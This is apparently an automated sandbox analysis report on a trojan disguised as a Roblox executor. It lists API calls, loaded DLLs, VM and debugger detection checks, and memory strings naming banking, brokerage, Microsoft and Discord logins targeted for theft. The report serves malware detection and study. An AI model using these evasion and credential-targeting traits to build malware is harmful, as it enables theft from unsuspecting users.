                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00421D506_2_00421D50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040955D6_2_0040955D
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004385606_2_00438560
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041DD006_2_0041DD00
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042FD396_2_0042FD39
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043BDEE6_2_0043BDEE
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00405D806_2_00405D80
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004175826_2_00417582
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00425D876_2_00425D87
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00422D946_2_00422D94
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042B5A26_2_0042B5A2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042C5AC6_2_0042C5AC
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00423DB06_2_00423DB0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00426DB66_2_00426DB6
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041E6606_2_0041E660
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00435E626_2_00435E62
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004146706_2_00414670
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0042C6006_2_0042C600
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00436E106_2_00436E10
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043E6306_2_0043E630
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040AE346_2_0040AE34
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041F6E06_2_0041F6E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004386F96_2_004386F9
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00402E806_2_00402E80
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00414EA06_2_00414EA0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00417F486_2_00417F48
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_00437F506_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043DF606_2_0043DF60
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041171D6_2_0041171D
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043571D6_2_0043571D
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004287C56_2_004287C5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040A7D06_2_0040A7D0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043EFF06_2_0043EFF0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0040E7AC6_2_0040E7AC
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: String function: 002F9BF0 appears 94 times
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: String function: 00414660 appears 70 times
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: String function: 0030670D appears 34 times
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: String function: 00301D28 appears 42 times
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: String function: 00407F30 appears 51 times
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003320970117846
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003320970117846
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/0@1/1
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_004374E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,6_2_004374E0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCommand line argument: T00_2_00305440
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCommand line argument: T03_2_00305440
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2063123407.0000000005795000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2052381585.0000000005799000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2052063015.00000000057B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeFile read: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess created: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F9DAA push ecx; ret 0_2_002F9DBD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F9DAA push ecx; ret 3_2_002F9DBD
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_0302A071 push ds; retf 6_3_0302A072
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_02FC0F10 push esp; retf 6_3_02FC0F11
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_3_03026773 push es; ret 6_3_030267BA
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe TID: 3716Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe TID: 3716Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0030B6E8 FindFirstFileExW,0_2_0030B6E8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0030B799
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_0030B6E8 FindFirstFileExW,3_2_0030B6E8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0030B799
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.0000000005833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145247531.0000000002F7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.0000000005833000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Solara-Roblox-Executor-v3.exe, 00000006.00000003.2062708071.000000000582E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0043C6B0 LdrInitializeThunk,6_2_0043C6B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00301A60
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0032019E mov edi, dword ptr fs:[00000030h]0_2_0032019E
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F1BA0 mov edi, dword ptr fs:[00000030h]0_2_002F1BA0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F1BA0 mov edi, dword ptr fs:[00000030h]3_2_002F1BA0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_00307020 GetProcessHeap,0_2_00307020
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F9A67 SetUnhandledExceptionFilter,0_2_002F9A67
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00301A60
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F9A73
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_002F96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002F96B3
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F9A67 SetUnhandledExceptionFilter,3_2_002F9A67
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_00301A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00301A60
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002F9A73
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_002F96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_002F96B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
